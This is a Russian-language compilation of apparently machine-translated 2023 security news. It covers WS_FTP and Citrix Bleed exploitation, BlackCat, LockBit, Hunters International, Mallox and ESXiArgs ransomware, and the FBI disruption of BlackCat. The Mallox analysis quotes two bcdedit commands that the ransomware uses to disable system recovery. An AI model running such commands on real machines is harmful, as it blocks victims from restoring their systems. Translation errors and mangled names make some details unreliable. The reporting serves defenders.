Уязвимость, отслеживаемая как CVE-2023-40044, вызвана уязвимостью десериализации .NET в модуле Ad Hoc Transfer, позволяющей неаутентифицированным злоумышленникам удаленно выполнять команды в базовой ОС через HTTP-запросы.
27 сентября Progress Software выпустила обновления безопасности для устранения критической уязвимости сервера WS_FTP, призывая администраторов обновить уязвимые экземпляры.
«Мы рекомендуем выполнить обновление до самой последней версии — 8.8.2. Обновление до исправленной версии с использованием полного установщика — единственный способ решить эту проблему», — сказал Прогресс.
Исследователи безопасности Assetnote, обнаружившие ошибку WS_FTP, выпустили код эксплойта для проверки концепции (PoC) всего через несколько дней после того, как она была исправлена.
«В результате нашего анализа WS_FTP мы обнаружили, что в Интернете около 2,9 тыс. хостов используют WS_FTP (а также имеют открытый веб-сервер, что необходимо для эксплуатации). Большинство этих онлайн-активов принадлежат крупным предприятиям, правительствам и образовательных учреждений», — сказали в Assetnote.
Компания по кибербезопасности Rapid7 сообщила, что злоумышленники начали использовать CVE-2023-40044 3 сентября, в день, когда был выпущен эксплойт PoC.
«Цепочка выполнения процессов выглядит одинаково во всех наблюдаемых экземплярах, что указывает на возможную массовую эксплуатацию уязвимых серверов WS_FTP», — предупредил Rapid7.
Shodan перечисляет почти 2000 подключенных к Интернету устройств, на которых установлено программное обеспечение WS_FTP Server, что подтверждает первоначальные оценки Assetnote.
Организации, которые не могут немедленно исправить свои серверы, могут блокировать входящие атаки, отключив уязвимый модуль специальной передачи сервера WS_FTP.
Hunters International Ramsonware возможно является ребрендингом Hive
Появился новый бренд, предлагающий программы-вымогатели как услугу, под названием Hunters International, использующий код Hive Ramsonware, что позволяет предположить, что прежняя группа возобновила деятельность под другим флагом.
Эта теория подтверждается анализом нового шифровальщика, выявившим множественное дублирование кода.
Исследователи безопасности, проанализировав образец вредоносного ПО Hunters International, обнаружили поразительное сходство с кодом, использованным в атаках программ-вымогателей Hive.
В частности, аналитик вредоносного ПО и реверс-инженер rivitna, который первым заметил новый шифратор, пришел к выводу, что вредоносное ПО Hunters International представляет собой образец программы-вымогателя Hive версии 6.
Исследователь безопасности Уилл Томас рассказал, что он обнаружил «некоторые поддерживаемые строки программы-вымогателя Hive» в коде Hunters International.
Присмотревшись к выборке Hunters International, исследователь обнаружил совпадения и сходства кода, которые соответствуют более чем 60% кода программы-вымогателя Hive.
Однако группа Hunters International опровергает «обвинения» исследователей, утверждая, что это новый сервис на рынке программ-вымогателей, который приобрел исходный код шифровальщика у разработчиков Hive.
«Все исходные коды Hive были проданы, включая веб-сайт и старые версии Golang и C, и мы — те, кто их купил», — говорит Hunters International.
Hive International утверждает, что код Hive содержал «множество ошибок, которые в некоторых случаях приводили к недоступности для расшифровки», но они это исправили.
На данный момент остается неизвестным, продала ли Hive исходный код другим кибергруппам или нет, но деятельность Hive внезапно остановилась после того, как ее сайт платежей Tor и сайт утечки данных был захвачен в ходе международной операции в январе 2023г.
BlackCat заявляет о взломе гиганта здравоохранения Henry Schein
BlackCat (ALPHV) утверждает, что взломала сеть гиганта здравоохранения Генри Шейна и украла десятки терабайт данных, включая данные о заработной плате и информацию об акционерах.
Генри Шейн — поставщик решений в области здравоохранения и компания из списка Fortune 500 с операциями и филиалами в 32 странах и доходом более 12 миллиардов долларов в 2022 году.
15 октября компания сообщила, что ей пришлось отключить некоторые системы, чтобы сдержать кибератаку, которая затронула ее производственный и дистрибьюторский бизнес днем ранее.
«Генри Шейн оперативно принял меры предосторожности, включая отключение определенных систем и другие меры, направленные на сдерживание инцидента, который привел к временному нарушению некоторых бизнес-операций Генри Шейна. Компания работает над разрешением ситуации как можно скорее», оно сказало.
Хотя некоторые из ее бизнес-операций были прерваны, компания заявляет, что это не повлияло на ее программное обеспечение для управления практикой Генри Шейна One.
Генри Шейн уведомил соответствующие правоохранительные органы об инциденте и с тех пор нанял внешних экспертов по кибербезопасности и криминалистике для расследования потенциальной утечки данных, возникшей в результате атаки.
В письме, опубликованном через неделю после раскрытия информации о кибератаке, поставщик медицинских услуг призвал клиентов размещать заказы через своего представителя Генри Шейна или использовать специальные телефонные номера для продаж по телефону.
Почти две недели спустя BlackCat/ALPHV добавила Генри Шейна на свой сайт утечки информации в темной сети, заявив, что они взломали сеть компании и украли 35 ТБ конфиденциальных файлов.
BlackCat/ALPHV утверждает, что они снова зашифровали устройства компании как раз в тот момент, когда Генри Шейн почти завершил восстановление всех ее систем, поскольку текущие переговоры провалились.
«Несмотря на продолжающиеся обсуждения с командой Генри, мы не получили никаких признаков их готовности уделять приоритетное внимание безопасности своих клиентов, партнеров и сотрудников, не говоря уже о защите собственной сети», — заявили злоумышленники.
«Сегодня в полночь часть их внутренних данных о заработной плате и папок акционеров будет опубликована в нашем блоге о сборах. Мы продолжим публиковать больше данных ежедневно».
Запись Генри Шейна на сайте утечки данных BlackCat с тех пор была удалена, что намекало на то, что компания возобновит переговоры или выплатит выкуп.
О BlackCat стало известно в ноябре 2021 года. Предполагается, что она является ребрендингом пресловутой группы DarkSide/BlackMatter.
Boeing подтверждает кибератаку на фоне заявлений о вымогательстве LockBit
Аэрокосмический гигант Boeing расследует кибератаку, которая повлияла на его бизнес по производству запчастей и дистрибуции после того, как LockBit заявила, что они взломали сеть компании и украли данные.
В Boeing заявили, что инцидент не повлиял на безопасность полетов, и подтвердили сотрудничество с правоохранительными и регулирующими органами в рамках текущего расследования.
Сервисный веб-сайт Boeing в настоящее время недоступен из-за сообщения о том, что продолжающееся отключение вызвано «техническими проблемами».
«Нам известно о киберинциденте, затронувшем элементы нашего бизнеса по доставке запчастей и дистрибуции. Эта проблема не влияет на безопасность полетов», — сообщил Boeing
«Мы активно расследуем инцидент и координируем работу с правоохранительными и контролирующими органами. Мы уведомляем наших клиентов и поставщиков».
LockBit заявила, что они якобы взломали сеть Boeing и украли значительный объем конфиденциальной информации, которую через пять дней они опубликуют в Интернете, если производитель самолетов не свяжется с вами до истечения установленного срока.
Хотя компания Boeing еще не подтвердила связь между заявлениями LockBit и инцидентом, который затронул некоторые из ее систем, страница утечки данных на dark веб-сайте теперь удалена.
«Огромное количество конфиденциальных данных было извлечено и готово к публикации, если Boeing не свяжется с нами в установленные сроки», — говорилось в сообщении перед удалением.
«На данный момент мы не будем отправлять списки или образцы, чтобы защитить компанию, НО мы не будем хранить их до истечения крайнего срока».
Обычно это происходит, когда жертвы либо начинают вести переговоры о выкупе с бандой вымогателей, либо если они уже заплатили за прекращение публикации украденных файлов в Интернете и за получение инструмента расшифровки.
LockBit использует Citrix Bleed в атаках, уязвимо 10 тысяч серверов
Атаки программ-вымогателей Lockbit используют общедоступные эксплойты уязвимости Citrix Bleed (CVE-2023-4966) для взлома систем крупных организаций, кражи данных и шифрования файлов.
Хотя Citrix выпустила исправления для CVE-2023-4966 более месяца назад, на тысячах конечных точек, доступных в Интернете, все еще используются уязвимые устройства, многие из которых находятся в США.
Громкие атаки на Lockbit
Исследователь угроз Кевин Бомонт отслеживал атаки на различные компании, в том числе на Промышленный и коммерческий банк Китая (ICBC), DP World, Allen & Overy и Boeing, и обнаружил, что у них есть что-то общее.
Это открытые серверы Citrix [1, 2], уязвимые для уязвимости Citrix Bleed, которую, по его словам, использует LockBit.
Это было дополнительно подтверждено газетой Wall Street Journal, которая получила электронное письмо от Министерства финансов США, отправленное некоторым поставщикам финансовых услуг, в котором упоминалось, что LockBit несет ответственность за кибератаку на ICBC, которая была достигнута путем использования уязвимости Citrix Bleed.
Если LockBit использовал уязвимость для взлома одной компании, считается, что они, вероятно, аналогичным образом взломали Boeing и DP World.
Эти атаки, вероятно, проводятся филиалом LockBit, который активно использует эту уязвимость для взлома сетей.
Поскольку LockBit является крупнейшей программой-вымогателем как услугой, она использует множество партнеров, которые имеют полную свободу действий в отношении взлома сетей.
Как мы видели на примере партнера, который участвовал как в GandCrab, так и в REvil, хакеры нередко сосредотачиваются на одной конкретной отрасли или методе первоначального доступа.
Например, филиал GandCrab/REvil специализируется на использовании программного обеспечения MSP [1, 2, 3] для шифрования компаний, и мы, вероятно, видим филиал LockBit, использующий уязвимость Citrix Bleed для массового взлома сетей.
Массивная поверхность атаки
По данным японского исследователя угроз Ютаки Седжиямы, на момент написания более 10 400 серверов Citrix уязвимы для CVE-2023-4966.
Большинство серверов (3133) находятся в США, за ними следуют 1228 в Германии, 733 в Китае, 558 в Великобритании, 381 в Австралии, 309 в Канаде, 301 во Франции, 277 в Италии, 252 в Испании, 244 в Канаде. Нидерландах и 215 в Швейцарии.
Сканирование Седжиямы выявило уязвимые серверы в крупных и критически важных организациях в вышеупомянутых и многих других странах, причем все они остаются неисправленными в течение целого месяца после публичного раскрытия критической уязвимости.
Подробнее о Citrix Bleed
Citrix Bleed был объявлен 10 октября как критическая проблема безопасности, которая затрагивает ADC и шлюз Citrix NetScaler, обеспечивая доступ к конфиденциальной информации об устройствах.
Компания Mandiant сообщила, что злоумышленники начали использовать Citrix Bleed в конце августа, когда брешь в системе безопасности еще существовала. В ходе атак хакеры использовали HTTP-запросы GET для получения файлов cookie сеанса Netscaler AAA после этапа многофакторной аутентификации (MFA).
Citrix призвала администраторов защищать системы от таких несложных атак без взаимодействия. 25 октября компания AssetNote, занимающаяся управлением внешними поверхностями атак, выпустила экспериментальный эксплойт, демонстрирующий, как можно украсть токены сеанса.
ALPHV/BlackCat вывела вымогательство на новый уровень, подав в Комиссию по ценным бумагам и биржам США жалобу на одну из предполагаемых жертв за несоблюдение правила четырех дней для раскрытия информации о кибератаке.
Ранее сегодня злоумышленник включил в список утечки данных компанию-разработчика программного обеспечения MeridianLink, пригрозив, что она сольет якобы украденные данные, если в течение 24 часов не будет выплачен выкуп.
MeridianLink — это публичная компания, которая предоставляет цифровые решения для финансовых организаций, таких как банки, кредитные союзы и ипотечные кредиторы.
Хакеры донесли на SEC
По данным DataBreaches.net, ALPHV заявила, что 7 ноября они взломали сеть MeridianLink и украли данные компании без использования систем шифрования.
Участник программы-вымогателя сказал, что «похоже, что MeridianLink связалась с нами, но мы еще не получили сообщения с их стороны», чтобы договориться о выплате в обмен на неразглашение предположительно украденных данных.
Предполагаемое отсутствие ответа со стороны компании, вероятно, побудило хакеров оказать большее давление, отправив жалобу в Комиссию по ценным бумагам и биржам США (SEC) на то, что MeridianLink не раскрыла инцидент кибербезопасности, который повлиял на «данные клиентов и операционную информацию».
Чтобы показать, что их жалоба реальна, ALPHV опубликовала на своем сайте скриншот формы, которую они заполнили на странице «Советы, жалобы и рекомендации» SEC.
По их собственным словам, злоумышленник сообщил SEC, что компания MeridianLink подверглась «существенному нарушению» и не раскрыла это, как того требует форма 8-К согласно пункту 1.05.
После шквала инцидентов безопасности в организациях США SEC приняла новые правила, которые требуют от публичных компаний сообщать о кибератаках, которые оказывают существенное влияние, т.е. влияют на инвестиционные решения.
Отчеты об инцидентах кибербезопасности «сдаются через четыре рабочих дня после того, как владелец регистрации определит, что инцидент кибербезопасности является существенным», говорится в новом правиле.
Однако новые правила кибербезопасности SEC должны вступить в силу 15 декабря 2023 года, пояснило агентство Reuters в начале октября.
ALPHV также разместила на своем сайте ответ, полученный от SEC на жалобу против MeridianLink, чтобы продемонстрировать, что заявление было получено.
MeridianLink подтверждает кибератаку
В заявлении компания MeridianLink сообщила, что после выявления инцидента компания немедленно приняла меры по сдерживанию угрозы и привлекла к расследованию группу сторонних экспертов.
Компания добавила, что она все еще работает над тем, чтобы определить, была ли кибератака затронула какую-либо личную информацию потребителей, и если это так, она уведомит пострадавшие стороны.
«По итогам нашего расследования на сегодняшний день мы не выявили никаких доказательств несанкционированного доступа к нашим производственным платформам, и этот инцидент вызвал минимальные перерывы в работе бизнеса». - MeridianLink
Хотя многие группы, занимающиеся программами-вымогателями и вымогателями, угрожают сообщить в SEC о нарушениях и краже данных, это может быть первым публичным подтверждением того, что они это сделали.
Mallox воскрес | Атаки программ-вымогателей с использованием MS-SQL продолжают усложнять жизнь предприятиям.
Ситуация с программами-вымогателями характеризуется сильным оттоком как групп участников, так и семейств вредоносных программ, и лишь немногие игроки демонстрируют относительное долголетие. Когда-то внушавшие страх угрозы, такие как REvil и Conti, были либо демонтированы, либо распущены, в то время как другие – например, ALPHV, Black Basta и LockBit – продолжают безнаказанно вымогать деньги у компаний. Ко второму списку мы также можем добавить Mallox (также известный как TargetCompany), менее известную, но давно существующую угрозу-вымогателя, впервые замеченную в 2021 году. Сегодня группа продолжает воровать и сливать постоянный поток корпоративных данных.
В этом посте мы освещаем недавнюю активность Mallox, объясняем первоначальные методы доступа группы и предоставляем высокоуровневый анализ недавних полезных нагрузок Mallox, чтобы помочь защитникам лучше понять и защититься от этой постоянной угрозы.
Работая по модели «Программы-вымогатели как услуга» (RaaS), Mallox использует известные подпольные форумы и рынки, такие как Nulled и RAMP, для рекламы своих услуг и набора партнеров. Группа поддерживает сайт утечек на базе TOR, где регулярно объявляет о недавно скомпрометированных организациях и раскрывает украденные данные. Маллокс также присутствует в Twitter/X для аналогичных целей.
Mallox в первую очередь получает первоначальный доступ за счет использования уязвимых и общедоступных сервисов, уделяя особое внимание интерфейсам MS-SQL (Microsoft SQL Server) и ODBC (Open Database Connectivity). Целью являются конкретные уязвимости, в том числе неисправленные экземпляры старых уязвимостей удаленного выполнения кода (RCE), таких как CVE-2019-1068 в Microsoft SQL Server и CVE-2020-0618 в Microsoft SQL Server Reporting Services.
Кроме того, группа успешно использует атаки методом перебора против слабо настроенных сервисов и приложений, открытых для общего доступа в Интернет. В ходе недавних кампаний участники Mallox получили первоначальный доступ посредством перебора на основе словаря против слабых интерфейсов MS-SQL. Однако известно, что филиалы Mallox используют и другие векторы, в том числе фишинговые электронные письма для доставки инфраструктур атак, таких как Cobalt Strike и Sliver.
После получения первоначального доступа злоумышленники Mallox обычно выполняют команды PowerShell для запуска различных пакетных сценариев и загрузки полезных данных программы-вымогателя. Такие сценарии, как Kill-Delete.bat или Bwmeldokiller.bat, используются для завершения или удаления запущенных процессов, которые могут помешать или помешать процедуре шифрования программы-вымогателя.
Команды выполняются для загрузки и запуска полезных нагрузок программы-вымогателя. Ниже приведен типичный пример:
Последовательность команд сначала создает сценарий PowerShell во временном каталоге системы, используя класс WebClient для загрузки исполняемого файла с удаленного сервера. Сценарий PowerShell updt.ps1 выполняется с обходом ограничений политики выполнения, что обеспечивает неограниченный запуск. Затем сценарий использует инструментарий управления Windows (WMIC) для выполнения полезной нагрузки программы-вымогателя.
Варианты Mallox с 2021 года по сегодняшний день демонстрируют весьма согласованный набор основных функций, что указывает на то, что злоумышленники продолжают добиваться успеха с помощью проверенной и проверенной формулы. Последние полезные данные помечены как «Mallox.Resurrection», что отражает изменение в заметках о выкупе, внесенных после шифрования.
Жестко запрограммированные исключения освобождают ряд типов файлов и процессов от шифрования. Типы файлов исключаются через именованные расширения:
При запуске программа-вымогатель запускает следующие команды:
bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {current} recoveryenabled no
Они служат для изменения настроек данных конфигурации загрузки (BCD), влияя на способность ОС восстанавливаться после сбоя и не позволяя администраторам восстановить систему с помощью встроенных инструментов Windows.
Зашифрованные файлы добавляются с расширением .mallox, а в каждую папку, содержащую заблокированные файлы, записывается записка о выкупе с именем файла «HOW TO BACK FILES.TXT». Записка о выкупе содержит инструкции о том, как получить инструмент расшифровки с помощью TOR, а также TargetID — уникальный идентификатор жертвы. Начиная с середины 2023 года мы заметили, что контактный адрес электронной почты в примечаниях о выкупе Mallox изменился с «mallox@onionmail» на «[email protected]».
В дополнение к запискам о выкупе на рабочий стол пользователя записывается файл «Targetinfo.txt». Этот файл также содержит TargetID, а также основные сведения о среде хоста (версия ОС, архитектура, имя хоста и т. д.).
Заключение
Несмотря на предыдущие неудачи, такие как выпуск общедоступного расшифровщика для более ранних версий своих полезных данных, Mallox поддерживает постоянный поток компрометаций и повторяет успешные версии своей программы-вымогателя. Продолжающееся злоупотребление непропатченными интерфейсами MS-SQL и подбор слабых паролей позволяет предположить, что группа не видит необходимости менять свою тактику, в то время как организации оставляют такой плодотворный путь открытым для злоумышленников.
ФБР прервало работу Blackcat и создало инструмент для дешифрования
ФБР успешно взломало серверы программы-вымогателя ALPHV, чтобы отслеживать их деятельность и получать ключи дешифрования.
7 декабря BleepingComputer впервые сообщил, что веб-сайты ALPHV, также известные как BlackCat, внезапно перестали работать, в том числе сайты переговоров Tor и сайты утечки данных банды вымогателей.
Хотя администратор ALPHV утверждал, что это проблема с хостингом, BleepingComputer узнал, что это связано с операцией правоохранительных органов.
Сегодня Министерство юстиции подтвердило нашу информацию, заявив, что ФБР провело правоохранительную операцию, которая позволила им получить доступ к инфраструктуре ALPHV.
Благодаря этому доступу ФБР в течение нескольких месяцев молча следило за работой программы-вымогателя, перекачивая ключи дешифрования. Эти ключи расшифровки позволили ФБР бесплатно помочь 500 жертвам восстановить их файлы, сэкономив примерно 68 миллионов долларов на требованиях выкупа.
Кроме того, ФБР конфисковало домен сайта утечки данных ALPHV, на котором теперь отображается баннер, сообщающий, что он был конфискован в ходе международной операции правоохранительных органов.
ФБР заявляет, что они захватили веб-сайт после получения пар открытого и закрытого ключей для скрытых сервисов Tor, под управлением которых работал веб-сайт, что позволило им получить контроль над URL-адресами.
«В ходе этого расследования правоохранительные органы получили доступ к сети Blackcat Ransomware Group», — говорится в распечатанном ордере на обыск.
«В результате ФБР выявило и собрало 946 пар открытых/закрытых ключей для сайтов Tor, которые группа Blackcat Ransomware Group использовала для размещения сайтов общения с жертвами, сайтов утечек и партнерских панелей, подобных описанным выше».
«ФБР сохранило эти пары открытого и закрытого ключей на флэш-накопителе».
В сообщении о задержании говорится, что правоохранительная операция проводилась полицией и следственными органами США, Европола, Дании, Германии, Великобритании, Нидерландов, Германии, Австралии, Испании и Австрии.
«Федеральное бюро расследований конфисковало этот сайт в рамках скоординированных действий правоохранительных органов, предпринятых против программы-вымогателя ALPHV BlackCat», — говорится в сообщении об аресте.
«Эти действия были предприняты в координации с прокуратурой США по южному округу Флориды и отделом компьютерных преступлений и интеллектуальной собственности Министерства юстиции при существенном содействии Европола и Zentrale Kriminalinspektion Guttingen».
С момента сбоя в работе серверов ALPHV филиалы теряли доверие к этой операции: BleepingComputer узнал, что они связывались с жертвами напрямую по электронной почте, а не через сайт переговоров Tor.
Вероятно, это произошло из-за того, что злоумышленники полагали, что инфраструктура ALPHV была скомпрометирована правоохранительными органами, что подвергло их риску, если они ее воспользуются.
Компания-вымогатель LockBit также восприняла этот сбой как ранний праздничный подарок, сообщив своим филиалам, что они могут перейти в его подразделение, чтобы продолжить переговоры с жертвами.
Эта операция на протяжении многих лет осуществлялась под разными названиями и каждый раз подвергалась взлому со стороны правоохранительных органов.
Первоначально они были запущены как DarkSide в августе 2020 года, а затем закрылись в мае 2021 года, столкнувшись с сильным давлением со стороны правоохранительных органов, вызванным широко разрекламированной атакой банды на Colonial Pipeline.
Позднее операция по вымогательству вернулась под названием BlackMatter 31 июля, но снова была прекращена в ноябре 2021 года после того, как Emsisoft воспользовалась уязвимостью для создания дешифратора и серверы были захвачены.
Группа снова вернулась в ноябре 2021 года, на этот раз под названием BlackCat/ALPHV. С тех пор BlackCat постоянно совершенствует свою тактику вымогательства и использует необычный подход, заключаясь в партнерстве с англоязычными филиалами.
Как мы видели в прошлом, в результате этой операции неудивительно, что в ближайшем будущем группа снова проведет ребрендинг под другим именем.
Комментарии
Администраторы, хостинг-провайдеры и Французская группа реагирования на компьютерные чрезвычайные ситуации (CERT-FR) предупреждают, что злоумышленники активно нацелены на неисправленные серверы VMware ESXi против уязвимости удаленного выполнения кода двухлетней давности для развертывания новой программы-вымогателя ESXiArgs.
Уязвимость, отслеживаемая как CVE-2021-21974, вызвана проблемой переполнения динамической памяти в службе OpenSLP, которая может быть использована злоумышленниками, не прошедшими проверку подлинности, в атаках низкой сложности.
«По данным текущих расследований, эти кампании атак, по-видимому, используют уязвимость CVE-2021-21974, исправление для которой доступно с 23 февраля 2021 года», — говорится в сообщении CERT-FR.
«В настоящее время целевыми системами будут гипервизоры ESXi версии 6.x и ранее 6.7».
Чтобы блокировать входящие атаки, администраторы должны отключить уязвимую службу протокола определения местоположения службы (SLP) на гипервизорах ESXi, которые еще не были обновлены.
CERT-FR настоятельно рекомендует установить исправление как можно скорее, но добавляет, что системы, оставшиеся без исправлений, также следует сканировать на наличие признаков компрометации.
CVE-2021-21974 влияет на следующие системы:
ESXi версии 7.x до ESXi70U1c-17325551
ESXi версии 6.7.x до ESXi670-202102401-SG
ESXi версии 6.5.x до ESXi650-202102101-SG
Французский поставщик облачных услуг OVHcloud впервые опубликовал отчет, в котором эта массовая волна атак, нацеленных на серверы VMware ESXi, была связана с операцией программы-вымогателя в Неваде.
«По мнению экспертов из экосистемы, а также властей, они могут быть связаны с программой-вымогателем из Невады и используют CVE-2021-21974 в качестве вектора компрометации. Расследование для подтверждения этих предположений все еще продолжается», — сказал директор по информационной безопасности OVHcloud Жюльен Леврард.
«Атака в первую очередь нацелена на серверы ESXi версии до 7.0 U3i, очевидно, через порт OpenSLP (427)».
Однако вскоре после того, как наша история была опубликована, компания отступила, заявив, что они объяснили это неправильной операцией программы-вымогателя.
В конце первого дня атак было зашифровано около 120 серверов ESXi.
Однако за выходные их число быстро выросло: по данным Censys, 2400 устройств VMware ESXi по всему миру в настоящее время обнаружены как скомпрометированные в ходе кампании по вымогательству.
В бюллетене, опубликованном 6 февраля, VMware подтвердила, что эта атака использует старые недостатки ESXi, а не уязвимость нулевого дня.
Компания советует администраторам установить последние обновления для серверов ESXi и отключить службу OpenSLP, которая отключена по умолчанию с 2021 года.
В целом, кампания по вымогательству не имела большого успеха, учитывая большое количество зашифрованных устройств: служба отслеживания платежей выкупа Ransomwhere сообщила только о четырех платежах выкупа на общую сумму 88 000 долларов США.
Отсутствие выкупа, вероятно, связано с руководством по восстановлению VMware ESXi, созданным исследователем безопасности Энесом Сонмезом, которое позволяет многим администраторам бесплатно перестраивать свои виртуальные машины и восстанавливать свои данные.
Новый вымогатель ESXiArgs
Однако, судя по примечаниям о выкупе, обнаруженным в этой атаке, они не связаны с программой-вымогателем Nevada, а относятся к новому семейству программ-вымогателей.
Примерно четыре часа назад жертвы этой кампании также начали сообщать об атаках на форуме BleepingComputer, прося помощи и дополнительной информации о том, как восстановить свои данные.
Программа-вымогатель шифрует файлы с расширениями .vmxf, .vmx, .vmdk, .vmsd и .nvram на скомпрометированных серверах ESXi и создает файл .args для каждого зашифрованного документа с метаданными (вероятно, необходимыми для расшифровки).
В то время как субъекты угрозы, стоящие за этой атакой, утверждают, что украли данные, одна жертва сообщила на форумах BleepingComputer, что в их инциденте этого не было.
«Наше расследование показало, что данные не были заражены. В нашем случае на атакованной машине было более 500 ГБ данных, но обычное ежедневное использование составляло всего 2 Мбит/с. Мы просмотрели статистику трафика за последние 90 дней и не обнаружили доказательств исходящих данных. перевод", - сказал админ.
Жертвы также нашли заметки о выкупе под названием «ransom.html» и «Как восстановить ваши файлы.html» в заблокированных системах. Другие сказали, что их заметки представляют собой текстовые файлы.
Майкл Гиллеспи из ID Ransomware в настоящее время отслеживает программу-вымогатель под именем «ESXiArgs», но сообщил BleepingComputer, что, пока мы не найдем образец, невозможно определить, есть ли у него какие-либо недостатки в шифровании.
BleepingComputer имеет специальную тему поддержки ESXiArgs, где люди сообщают о своем опыте с этой атакой и получают помощь в восстановлении машин.
Технические детали ESXiArgs
Прошлой ночью администратор получил копию шифровальщика ESXiArgs и связанного сценария оболочки и поделился им в теме поддержки BleepingComputer.
Анализ скрипта и шифровальщика позволил нам лучше понять, как проводились эти атаки.
При взломе сервера в папке /tmp сохраняются следующие файлы:
encrypt — исполняемый файл ELF-шифровальщика.
encrypt.sh — сценарий оболочки, который действует как логика атаки, выполняя различные задачи перед запуском шифровальщика, как описано ниже.
public.pem — открытый ключ RSA, используемый для шифрования ключа, который шифрует файл.
motd — примечание о выкупе в текстовом виде, которое будет скопировано в /etc/motd, чтобы оно отображалось при входе в систему. Исходный файл сервера будет скопирован в /etc/motd1.
index.html — примечание о выкупе в формате HTML, которое заменит домашнюю страницу VMware ESXi. Исходный файл сервера будет скопирован в index1.html в той же папке.
«Открытый.pem, который он ожидает, является открытым ключом RSA (я предполагаю, что это RSA-2048, основанный на просмотре зашифрованных файлов, но код технически принимает любой действительный PEM)», — написал Гиллеспи в теме поддержки на форуме.
«Для файла для шифрования он генерирует 32 байта с использованием защищенного CPRNG RAND_pseudo_bytes OpenSSL, а затем этот ключ используется для шифрования файла с использованием Sosemanuk, безопасного потокового шифра. Ключ файла шифруется с помощью RSA (OpenSSL RSA_public_encrypt) и добавляется к конец файла».
«Использование алгоритма Sosemanuk довольно уникально и обычно используется только в программах-вымогателях, полученных из исходного кода Babuk (вариант ESXi). Возможно, это так, но они модифицировали его для использования RSA вместо реализации Babuk Curve25519».
Этот анализ показывает, что ESXiArgs, вероятно, основан на утечке исходного кода Babuk, который ранее использовался другими кампаниями по вымогательству ESXi, такими как CheersCrypt и шифровальщик PrideLocker группы Quantum/Dagon.
Хотя примечания о выкупе для ESXiArgs и Cheerscrypt очень похожи, метод шифрования отличается, поэтому неясно, является ли это новым вариантом или просто общей кодовой базой Babuk.
Шифровальщик выполняется файлом сценария оболочки, который запускает его с различными аргументами командной строки, включая файл с открытым ключом RSA, файл для шифрования, фрагменты данных, которые не будут зашифрованы, размер блока шифрования и файл. размер.
Этот шифратор запускается с помощью сценария оболочки encrypt.sh, который действует как логика атаки, которую мы кратко опишем ниже.
При запуске сценарий выполнит следующую команду для изменения файлов конфигурации виртуальной машины ESXi (.vmx), чтобы строки «.vmdk» и «.vswp» были изменены на «1.vmdk» и «1.vswp».
https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/
Новые атаки программ-вымогателей ESXiArgs теперь шифруют большие объемы данных, что значительно усложняет, если не делает невозможным, восстановление зашифрованных виртуальных машин VMware ESXi.
В прошлую пятницу массированная и широко распространенная автоматизированная атака программ-вымогателей зашифровала более 3000 серверов VMware ESXi, доступных в Интернете, с помощью новой программы-вымогателя ESXiArgs.
В предварительных отчетах указывалось, что устройства были взломаны с использованием старых уязвимостей VMware SLP. Однако некоторые жертвы заявили, что SLP был отключен на их устройствах и все еще был взломан и зашифрован.
При шифровании устройства скрипт encrypt.sh ищет файлы виртуальной машины, соответствующие следующим расширениям:
Для каждого найденного файла скрипт проверяет размер файла и, если размер файла меньше 128 МБ, шифрует весь файл с шагом 1 МБ.
Однако для файлов размером более 128 МБ будет вычисляться «size_step», что заставит шифровальщик попеременно шифровать 1 МБ данных и не шифровать фрагменты (size_step в мегабайтах) данных.
Сценарий encrypt.sh использует следующую формулу (слегка измененную для удобочитаемости), чтобы определить, какой size_step следует использовать:
Это означает, что для файла размером 4,5 ГБ он будет генерировать size_step равным «45», заставляя шифровальщик чередовать шифрование 1 МБ файла и пропуск 45 МБ файла. Итак, как вы можете видеть, довольно много данных остается незашифрованным к моменту завершения шифрования файла.
Для еще больших файлов, таких как файл размером 450 ГБ, объем пропущенных данных резко возрастает, при этом size_step становится равным «4607», теперь чередуется шифрование 1 МБ и пропуск 4,49 ГБ данных.
Из-за этих больших фрагментов незашифрованных данных исследователи разработали метод восстановления виртуальных машин с использованием больших и в основном незашифрованных плоских файлов, в которых хранятся данные диска виртуальной машины.
Сценарий, созданный CISA, позже автоматизировал этот процесс восстановления.
Процесс шифрования изменен
К сожалению, сегодня началась вторая волна программ-вымогателей ESXiArgs, которые включают в себя модифицированную процедуру шифрования, которая шифрует гораздо больше данных в больших файлах.
BleepingComputer впервые узнал о второй волне после того, как администратор опубликовал в теме поддержки ESXiArgs сообщение о том, что их сервер был зашифрован и не может быть восстановлен с помощью методов, которые работали ранее.
Поделившись образцами с BleepingComputer, мы заметили, что шифратор не изменился, но подпрограмма size_step скрипта encrypt.sh была удалена и просто установлена в 1 в новой версии.
Это изменение проиллюстрировано ниже в сравнении исходного вычисления size_step encrypt.sh (слева) в первой волне атак с новым сценарием оболочки (справа) во второй волне.
Эксперт по программам-вымогателям Майкл Гиллеспи сообщил, что это изменение заставляет шифровальщик чередовать шифрование 1 МБ данных и пропуск 1 МБ данных.
Все файлы размером более 128 МБ теперь будут иметь 50% зашифрованных данных, что делает их, вероятно, невосстановимыми.
Это изменение также препятствует успешному восстановлению машин предыдущими инструментами восстановления, поскольку в плоских файлах будет слишком много зашифрованных данных, чтобы их можно было использовать.
Эта вторая волна атаки также внесла незначительные изменения в примечание о выкупе, больше не включая биткойн-адреса в примечание о выкупе, как показано ниже.
Удаление биткойн-адресов, вероятно, произошло из-за того, что они были собраны исследователями безопасности для отслеживания выплат выкупа.
Однако, что еще более тревожно, администратор, который поделился новыми образцами, сказал, что SLP отключен на их сервере, но все равно снова взломан. Они также проверили наличие бэкдора vmtool.py, замеченного в предыдущих атаках, и не нашли его.
С отключенным SLP становится еще более запутанным вопрос о том, как этот сервер был взломан.
BleepingComputer по-прежнему рекомендует пытаться восстановить зашифрованные серверы ESXi с помощью сценария восстановления CISA.
Однако он, скорее всего, больше не будет работать, если вы были заражены во время второй волны атак с использованием новой процедуры шифрования.
https://www.bleepingcomputer.com/news/security/new-esxiargs-ransomware-version-prevents-vmware-esxi-recovery/
Кибергруппа Clop утверждает, что стоит за недавними атаками, которые использовали уязвимость в нулевом дне в инструменте Googhwhere MFT Secure File Transform, заявив, что они украли данные из более чем 130 организаций.
Недостаток безопасности, который теперь отслеживается как CVE-2023-0669, позволяет злоумышленникам получить удаленное выполнение кода на непропатченных экземплярах GoAnywhere MFT с их административной консолью, подверженной доступу в Интернете.
Clop обратился к BleepingComputer и сказал нам, что они якобы украли данные в течение десяти дней после нарушения уязвимых серверов для использования таргетинга этой ошибки.
